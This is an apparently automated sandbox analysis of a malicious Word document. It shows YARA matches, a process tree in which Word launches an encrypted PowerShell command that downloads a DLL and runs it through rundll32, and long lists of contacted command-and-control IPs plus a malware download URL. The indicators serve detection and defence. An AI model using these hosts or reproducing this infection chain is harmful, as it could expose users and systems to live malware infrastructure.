Source: Yara match File source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.750000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.770000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.750000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.990000.1.unpack, type: UNPACKEDPE
Behavior Graph ID: 344852 Sample: ARCH_25_012021.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100
Contacted: 1.226.84.243:8080 (unknown), 104.130.154.83:7080 (unknown), 91 other IPs or domains
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 16 other signatures

Process tree recovered from the behavior graph (graph image not reproduced):
WINWORD.EXE started
cmd.exe started (Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found)
  powershell.exe started (contacts shannared.com 192.169.223.13:80, AS-26496-GO-DADDY-COM-LLCUS, United States; dropped C:\Users\user\Kaktksw\An6othh\N49I.dll, PE32; Powershell drops PE file)
    rundll32.exe started
      rundll32.exe started
        rundll32.exe started (Hides that the sample has been downloaded from the Internet (zone.identifier))
          rundll32.exe started
            rundll32.exe started (Hides that the sample has been downloaded from the Internet (zone.identifier))
              rundll32.exe started
                rundll32.exe started (Hides that the sample has been downloaded from the Internet (zone.identifier))
                  rundll32.exe started
  msg.exe started

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
200.75.39.254:80 | unknown | unknown | unknown | unknown | true
192.175.111.212:7080 | unknown | unknown | unknown | unknown | true
91.233.197.70:80 | unknown | unknown | unknown | unknown | true
94.23.45.86:7080 | unknown | unknown | unknown | unknown | true
81.4.105.175:8080 | unknown | unknown | unknown | unknown | true
93.146.143.191:80 | unknown | unknown | unknown | unknown | true
93.149.120.214:80 | unknown | unknown | unknown | unknown | true
212.71.237.140:8080 | unknown | unknown | unknown | unknown | true
46.101.58.37:8080 | unknown | unknown | unknown | unknown | true
181.30.61.163:443 | unknown | unknown | unknown | unknown | true
206.189.232.2:8080 | unknown | unknown | unknown | unknown | true
181.10.46.92:80 | unknown | unknown | unknown | unknown | true
213.52.74.198:80 | unknown | unknown | unknown | unknown | true
87.106.253.248:8080 | unknown | unknown | unknown | unknown | true
217.160.169.110 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
51.255.203.164 | unknown | France | 16276 | OVHFR | true
191.223.36.170:80 | unknown | unknown | unknown | unknown | true
186.177.174.163:80 | unknown | unknown | unknown | unknown | true
217.13.106.14:8080 | unknown | unknown | unknown | unknown | true
138.97.60.141:7080 | unknown | unknown | unknown | unknown | true
201.185.69.28:443 | unknown | unknown | unknown | unknown | true
45.16.226.117:443 | unknown | unknown | unknown | unknown | true
82.208.146.142:7080 | unknown | unknown | unknown | unknown | true
192.169.223.13 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
1.226.84.243:8080 | unknown | unknown | unknown | unknown | true
84.232.229.24 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true
70.32.115.157:8080 | unknown | unknown | unknown | unknown | true
217.160.169.110:8080 | unknown | unknown | unknown | unknown | true
85.105.239.184:443 | unknown | unknown | unknown | unknown | true
152.170.79.100:80 | unknown | unknown | unknown | unknown | true
143.0.85.206:7080 | unknown | unknown | unknown | unknown | true
51.255.203.164:8080 | unknown | unknown | unknown | unknown | true
94.176.234.118:443 | unknown | unknown | unknown | unknown | true
50.28.51.143:8080 | unknown | unknown | unknown | unknown | true
185.94.252.27:443 | unknown | unknown | unknown | unknown | true
31.27.59.105:80 | unknown | unknown | unknown | unknown | true
197.232.36.108:80 | unknown | unknown | unknown | unknown | true
190.45.24.210:80 | unknown | unknown | unknown | unknown | true
185.183.16.47:80 | unknown | unknown | unknown | unknown | true
190.24.243.186:80 | unknown | unknown | unknown | unknown | true
190.64.88.186:443 | unknown | unknown | unknown | unknown | true
82.48.39.246:80 | unknown | unknown | unknown | unknown | true
191.241.233.198:80 | unknown | unknown | unknown | unknown | true
170.81.48.2:80 | unknown | unknown | unknown | unknown | true
172.245.248.239:8080 | unknown | unknown | unknown | unknown | true
154.127.113.242:80 | unknown | unknown | unknown | unknown | true
95.76.153.115:80 | unknown | unknown | unknown | unknown | true
211.215.18.93:8080 | unknown | unknown | unknown | unknown | true
80.249.176.206:80 | unknown | unknown | unknown | unknown | true
110.39.160.38:443 | unknown | unknown | unknown | unknown | true
185.183.16.47 | unknown | Spain | 201453 | AKIWIFIAKIWIFIES | true
137.74.106.111:7080 | unknown | unknown | unknown | unknown | true
5.196.35.138:7080 | unknown | unknown | unknown | unknown | true
46.43.2.95:8080 | unknown | unknown | unknown | unknown | true
188.135.15.49:80 | unknown | unknown | unknown | unknown | true
177.23.7.151:80 | unknown | unknown | unknown | unknown | true
68.183.190.199:8080 | unknown | unknown | unknown | unknown | true
201.48.121.65:443 | unknown | unknown | unknown | unknown | true
105.209.235.113:8080 | unknown | unknown | unknown | unknown | true
94.126.8.1:80 | unknown | unknown | unknown | unknown | true
60.93.23.51:80 | unknown | unknown | unknown | unknown | true
62.84.75.50:80 | unknown | unknown | unknown | unknown | true
190.247.139.101:80 | unknown | unknown | unknown | unknown | true
138.97.60.140:8080 | unknown | unknown | unknown | unknown | true
177.85.167.10:80 | unknown | unknown | unknown | unknown | true
172.104.169.32:8080 | unknown | unknown | unknown | unknown | true
51.255.165.160:8080 | unknown | unknown | unknown | unknown | true
209.33.120.130:80 | unknown | unknown | unknown | unknown | true
149.202.72.142:7080 | unknown | unknown | unknown | unknown | true
12.163.208.58:80 | unknown | unknown | unknown | unknown | true
84.232.229.24:80 | unknown | unknown | unknown | unknown | true
81.17.93.134:80 | unknown | unknown | unknown | unknown | true
152.231.89.226:80 | unknown | unknown | unknown | unknown | true
87.106.46.107:8080 | unknown | unknown | unknown | unknown | true
78.206.229.130:80 | unknown | unknown | unknown | unknown | true
202.134.4.210:7080 | unknown | unknown | unknown | unknown | true
51.38.124.206:80 | unknown | unknown | unknown | unknown | true
187.162.248.237:80 | unknown | unknown | unknown | unknown | true
152.169.22.67:80 | unknown | unknown | unknown | unknown | true
12.162.84.2:8080 | unknown | unknown | unknown | unknown | true
190.162.232.138:80 | unknown | unknown | unknown | unknown | true
122.201.23.45:443 | unknown | unknown | unknown | unknown | true
109.101.137.162:8080 | unknown | unknown | unknown | unknown | true
85.214.26.7:8080 | unknown | unknown | unknown | unknown | true
116.125.120.88:443 | unknown | unknown | unknown | unknown | true
188.225.32.231:7080 | unknown | unknown | unknown | unknown | true
104.130.154.83:7080 | unknown | unknown | unknown | unknown | true
190.251.216.100:80 | unknown | unknown | unknown | unknown | true
104.131.41.185:8080 | unknown | unknown | unknown | unknown | true
80.15.100.37:80 | unknown | unknown | unknown | unknown | true
81.215.230.173:443 | unknown | unknown | unknown | unknown | true
149.62.173.247:8080 | unknown | unknown | unknown | unknown | true
167.71.148.58:443 | unknown | unknown | unknown | unknown | true
46.105.114.137:8080 | unknown | unknown | unknown | unknown | true
110.39.162.2:443 | unknown | unknown | unknown | unknown | true
190.210.246.253:80 | unknown | unknown | unknown | unknown | true
81.214.253.80:443 | unknown | unknown | unknown | unknown | true
138.197.99.250:8080 | unknown | unknown | unknown | unknown | true

Contacted Domains

Name | IP | Active
shannared.com | 192.169.223.13 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://shannared.com/content/lhALeS/ | true | Avira URL Cloud: malware | unknown